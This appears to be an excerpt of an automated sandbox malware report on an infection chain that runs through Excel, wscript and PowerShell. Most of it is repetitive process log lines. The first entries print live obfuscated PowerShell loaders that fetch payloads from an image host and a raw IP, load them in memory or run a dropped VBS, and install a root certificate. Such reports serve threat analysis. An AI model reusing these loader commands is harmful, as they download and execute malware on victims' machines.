Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE8986022D push eax; iretd		7_2_000007FE89860241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE898600BD pushad ; iretd		7_2_000007FE898600C1

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
